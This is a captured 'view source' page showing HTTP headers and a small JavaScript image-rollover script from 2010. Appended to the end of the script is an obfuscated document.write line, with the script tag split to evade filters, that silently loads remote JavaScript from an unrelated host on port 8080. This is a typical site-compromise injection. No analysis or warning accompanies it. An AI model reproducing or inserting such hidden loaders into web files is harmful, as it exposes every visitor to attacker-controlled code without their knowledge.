URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 200 OK
Date: Sat, 26 Jun 2010 04:08:12 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 06:22:25 GMT
ETag: "77c005-2fd-4c22f9a1"
Accept-Ranges: bytes
Content-Length: 765
Connection: close
Content-Type: application/x-javascript

function smartRollover() {
	if(document.getElementsByTagName) {
		var images = document.getElementsByTagName("img");

		for(var i=0; i < images.length; i++) {
			if(images[i].getAttribute("src").match("_off."))
			{
				images[i].onmouseover = function() {
					this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));
				}
				images[i].onmouseout = function() {
					this.setAttribute("src", this.getAttribute("src").replace("_on.", "_off."));
				}
			}
		}
	}
}

if(window.addEventListener) {
	window.addEventListener("load", smartRollover, false);
}
else if(window.attachEvent) {
	window.attachEvent("onload", smartRollover);
}
document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Website.js"></scr'+'ipt>');
 Questions or comments welcome: contact me.